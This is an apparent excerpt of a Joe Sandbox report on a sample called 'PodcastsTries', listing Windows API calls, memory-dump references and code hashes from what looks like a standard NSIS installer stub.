                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                          Strings
